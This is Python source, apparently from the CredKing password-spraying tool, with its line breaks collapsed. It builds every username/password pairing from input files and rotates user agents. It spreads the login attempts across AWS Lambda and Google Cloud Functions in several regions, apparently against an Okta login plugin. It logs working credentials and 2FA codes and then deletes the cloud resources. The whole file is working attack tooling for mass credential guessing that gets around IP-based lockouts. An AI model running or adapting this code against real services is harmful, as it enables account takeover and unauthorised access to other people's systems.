def create_zip(plugin): plugin_path = 'plugins/{}/'.format(plugin) random_name = next(generate_random()) build_zip = 'build/{}_{}.zip'.format(plugin, random_name) with lock: log_entry('Creating build deployment for plugin: {}'.format(plugin)) shutil.make_archive(build_zip[0:-4], 'zip', plugin_path) return build_zip
def check_function(function, function_name): # Get Status of the function and make sure that it is active while True: sleep = 5 status = function.get(name=function_name).execute() if status['status'] == 'ACTIVE': break else: log_entry(f"Waiting {sleep} seconds for function to become ACTIVE") time.sleep(sleep) log_entry(f"Created Function: {function_name}")
def invoke_function(function, function_name, payload): response = function.call(name=function_name, body=payload).execute() return_payload = json.loads(response['result']) user, password = return_payload['username'], return_payload['password'] code_2fa = return_payload['code'] if return_payload['success']: # clear_credentials(user, password) log_entry('(SUCCESS) {} / {} -> Success! (2FA: {})'.format( user, password, code_2fa)) else: log_entry('(FAILED) {} / {} -> Failed.'.format(user, password))
def clean_up(access_key, secret_access_key, only_lambdas=True): if not only_lambdas: client = init_client('iam', access_key, secret_access_key) client.delete_role(RoleName='CredKing_Role') for client_name, client in lambda_clients.items(): log_entry('Cleaning up lambdas in {}...'.format( client.meta.region_name)) try: lambdas_functions = client.list_functions(FunctionVersion='ALL', MaxItems=1000) if lambdas_functions: for lambda_function in lambdas_functions['Functions']: if not '$LATEST' in lambda_function['FunctionArn']: lambda_name = lambda_function['FunctionName'] arn = lambda_function['FunctionArn'] try: log_entry('Destroying {} in region: {}'.format( arn, client.meta.region_name)) client.delete_function(FunctionName=lambda_name) except: log_entry( 'Failed to clean-up {} using client region {}'. format(arn, region)) except: log_entry('Failed to connect to client region {}'.format(region)) filelist = [f for f in os.listdir('build') if f.endswith(".zip")] for f in filelist: os.remove(os.path.join('build', f))
def create_function(sa_credentials, project_id, source_url, location): service = build('cloudfunctions', 'v1', credentials=sa_credentials) # Calling the create function command log_entry(location) f_name = f'credking-function-{next(generate_random())}' # function_name = f"{locations_response['locations'][x]['name']}/functions/{f_name}" location_name = f"projects/{project_id}/locations/{location}" function_name = f"{location_name}/functions/{f_name}" log_entry(function_name) log_entry(f"Creating Function: {function_name}") # Create Function body = { "name": function_name, "availableMemoryMb": 128, "entryPoint": "lambda_handler", "description": "CredKing Function", "timeout": "60s", "runtime": "python37", "ingressSettings": "ALLOW_ALL", "maxInstances": 1, "sourceArchiveUrl": source_url, "httpsTrigger": {}, "vpcConnector": "", "serviceAccountEmail": _service_account_email } function = service.projects().locations().functions() function_resp = function.create(location=location_name, body=body).execute() log_entry(f"Function Resp: {function_resp}") return function_name
def create_lambda(access_key, secret_access_key, zip_path, region_idx): region = regions[region_idx] head, tail = ntpath.split(zip_path) build_file = tail.split('.')[0] plugin_name = build_file.split('_')[0] # TODO: Figure out how to do dynamic source in GCP to revert this back # handler_name = '{}.lambda_handler'.format(plugin_name) handler_name = '{}.lambda_handler'.format('main') zip_data = None with open(zip_path, 'rb') as fh: zip_data = fh.read() try: role_name = create_role(access_key, secret_access_key, region) client = init_client('lambda', access_key, secret_access_key, region) response = client.create_function( Code={ 'ZipFile': zip_data, }, Description='', FunctionName=build_file, Handler=handler_name, MemorySize=128, Publish=True, Role=role_name, Runtime='python3.7', Timeout=8, VpcConfig={}, ) log_entry('Created lambda {} in {}'.format(response['FunctionArn'], region)) return response['FunctionArn'] except Exception as ex: log_entry('Error creating lambda using {} in {}: {}'.format( zip_path, region, ex)) return None
def create_functions(sa_credentials, locations, project_id, source_url, thread_count): # Get Locations locations_response = locations.list( name=f'projects/{project_id}').execute() location_names = [ "us-central1", "us-east1", "us-east4", "europe-west1", "asia-east2" ] # log_entry(len(locations_response['locations'])) log_entry(len(location_names)) # print(json.dumps(locations,indent=2)) threads = thread_count if thread_count > len(location_names): threads = len(location_names) # Commenting out as this checked for earlier ''' elif thread_count > len(credentials['accounts']): threads = len(credentials['accounts']) ''' log_entry(f"Number of functions to be created: {threads}") function_names = [] function = locations.functions() with ThreadPoolExecutor(max_workers=threads) as executor: for x in range(0, threads): function_names.append( executor.submit(create_function, sa_credentials=sa_credentials, project_id=project_id, source_url=source_url, location=location_names[x])) for x in function_names: log_entry(x.result()) return [x.result() for x in function_names]
def invoke_lambda(access_key, secret_access_key, arn, payload): lambdas = [] arn_parts = arn.split(':') region, func = arn_parts[3], arn_parts[-1] client = init_client('lambda', access_key, secret_access_key, region) payload['region'] = region response = client.invoke(FunctionName=func, InvocationType="RequestResponse", Payload=bytearray(json.dumps(payload), 'utf-8')) return_payload = json.loads(response['Payload'].read().decode("utf-8")) user, password = return_payload['username'], return_payload['password'] code_2fa = return_payload['code'] if return_payload['success'] == True: # clear_credentials(user, password) log_entry('(SUCCESS) {} / {} -> Success! (2FA: {})'.format( user, password, code_2fa)) else: log_entry('(FAILED) {} / {} -> Failed.'.format(user, password))
def load_credentials(user_file, password_file, useragent_file=None): log_entry('Loading credentials from {} and {}'.format( user_file, password_file)) users = load_file(user_file) passwords = load_file(password_file) if useragent_file is not None: useragents = load_file(useragent_file) else: useragents = [ "Python CredKing (https://github.com/ustayready/CredKing)" ] for user in users: for password in passwords: cred = {} cred['username'] = user cred['password'] = password cred['useragent'] = random.choice(useragents) credentials['accounts'].append(cred) for cred in credentials['accounts']: q.put(cred)
def display_stats(start=True): if start: ''' lambda_count = 0 for lc, val in lambda_clients.items(): if val: lambda_count += 1 ''' log_entry('User/Password Combinations: {}'.format( len(credentials['accounts']))) #log_entry('Total Regions Available: {}'.format(len(regions))) #log_entry('Total Lambdas: {}'.format(lambda_count)) if end_time and not start: log_entry('End Time: {}'.format(end_time)) log_entry('Total Execution: {} seconds'.format(time_lapse))
def delete_zip(): # Delete Zip file_list = [f for f in os.listdir('build') if f.endswith(".zip")] for f in file_list: os.remove(os.path.join('build', f)) log_entry(f"Removing file {f}")
def delete_function(function, function_name): # Delete Function log_entry(function.delete(name=function_name).execute())
def main(args, pargs): global start_time, end_time, time_lapse # Required Fields thread_count = args.threads plugin = args.plugin username_file = args.userfile password_file = args.passwordfile environments = args.env gcp_enabled = False aws_enabled = False sa_file = None access_key = None secret_access_key = None for env in environments: if env == "gcp": # GCP Required Fields sa_file = args.sa_creds_file if sa_file is not None: print("Contains all the necessary GCP Fields") else: print("Field requirements are not met") sys.exit(0) gcp_enabled = True elif env == "aws": # AWS Required Fields access_key = args.access_key secret_access_key = args.secret_access_key if access_key is not None and secret_access_key is not None: print("Contains all the necessary AWS Fields") else: print("Field requirements are not met") sys.exit(0) aws_enabled = True else: print("Field requirements are not met") sys.exit(0) # Optional Fields user_agent_file = args.useragentfile pluginargs = {} for i in range(0, len(pargs) - 1): key = pargs[i].replace("--", "") pluginargs[key] = pargs[i + 1] start_time = datetime.datetime.utcnow() log_entry(f"Execution started at: {start_time}") # Prepare credential combinations into the queue load_credentials(username_file, password_file, user_agent_file) threads = thread_count # TODO: Need to figure out how to do this dynamically total_functions_available = len(location_names) + len(regions) if thread_count > total_functions_available: threads = len(total_functions_available) elif thread_count > len(credentials['accounts']): threads = len(credentials['accounts']) total_threads = 0 if len(credentials['accounts']) == 1 and len(environments) > 1: total_threads = 1 log_entry("Too many environments for only 1 credential") sys.exit(0) else: print(math.floor(thread_count / len(environments))) total_threads = threads threads = math.floor(total_threads / len(environments)) log_entry(f"Number of threads per environment: {threads}") functions = [] service = None bucket = None sa_credentials = None if gcp_enabled: sa_credentials = credkingGCP.service_account.Credentials.from_service_account_file( sa_file) # TODO: Evaluate if this variable is needed global _service_account_email _service_account_email = sa_credentials.service_account_email service = credkingGCP.build('cloudfunctions', 'v1', credentials=sa_credentials) storage_service = credkingGCP.build('storage', 'v1', credentials=sa_credentials) # Creating a bucket bucket_name = f"credking_{next(generate_random())}" body = {'name': bucket_name} log_entry(storage_service.buckets().insert( project=sa_credentials.project_id, predefinedAcl="projectPrivate", body=body).execute()) # Uploading a file from a created bucket storage_client = credkingGCP.storage.Client( project=sa_credentials.project_id, credentials=sa_credentials) bucket = storage_client.bucket(bucket_name) source_url = credkingGCP.create_bucket(bucket, 'okta') locations = service.projects().locations() functions = credkingGCP.create_functions(sa_credentials, locations, sa_credentials.project_id, source_url, threads) for x in functions: credkingGCP.check_function(locations.functions(), x) arns = [] if aws_enabled: # Prepare the deployment package zip_path = credkingAWS.create_zip(plugin) # Create lambdas based on thread count arns = credkingAWS.load_lambdas(access_key, secret_access_key, threads, zip_path) display_stats() # Start Spray serverless_list = arns + functions with ThreadPoolExecutor(max_workers=len(serverless_list)) as executor: for serverless in serverless_list: log_entry(f'Launching spray {serverless}...') executor.submit(start_spray, access_key=access_key, secret_access_key=secret_access_key, args=pluginargs, sa_credentials=sa_credentials, serverless=serverless) # Capture duration end_time = datetime.datetime.utcnow() time_lapse = (end_time - start_time).total_seconds() # Clean Up if gcp_enabled: for function_name in functions: credkingGCP.delete_function( service.projects().locations().functions(), function_name) credkingGCP.delete_bucket(bucket) credkingGCP.delete_zip() if aws_enabled: # Remove AWS resources and build zips credkingAWS.clean_up(access_key, secret_access_key, only_lambdas=True) display_stats(False)